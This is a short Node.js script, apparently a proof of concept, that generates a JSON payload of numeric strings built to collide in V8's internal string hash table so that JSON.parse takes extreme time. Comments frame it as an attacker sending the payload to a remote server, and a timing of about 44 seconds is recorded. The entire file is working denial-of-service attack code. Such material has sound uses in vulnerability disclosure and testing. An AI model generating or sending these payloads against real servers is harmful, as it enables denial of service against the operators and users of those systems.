const NS_PER_SEC = 1e9;


const time = process.hrtime();


const payload = [];
const val = 1234;
const MOD = 2 ** 19;
const CHN = 2 ** 17; // chain length
const REP = 2 ** 17; // repetitions of the target value
// Build the quadratic probing chain
let j = val + MOD;
for (let i = 1; i < CHN; i++) {
  payload.push(`${j}`);
  j = (j + i) % MOD;
}
// Repeat the target value to force lookups through the chain
for (let k = 0; k < REP; k++) {
  payload.push(`${val}`);
}
// On the client side: attacker crafts an adversarial JSON payload
// and sends it to the remote server.
const string = JSON.stringify({ data: payload });
console.log(`Payload size: ${string.length} bytes`, string);
// On the server side: V8 inserts the numeric strings in a hash table
// for internalization, the collisions lead to extreme amplification
// in resource consumption.
JSON.parse(string);


const diff = process.hrtime(time);
console.log(`Benchmark took ${diff[ 0 ] * NS_PER_SEC + diff[ 1 ]} nanoseconds`);
// Benchmark took 44357317375 nanoseconds
//44.3573174 seconds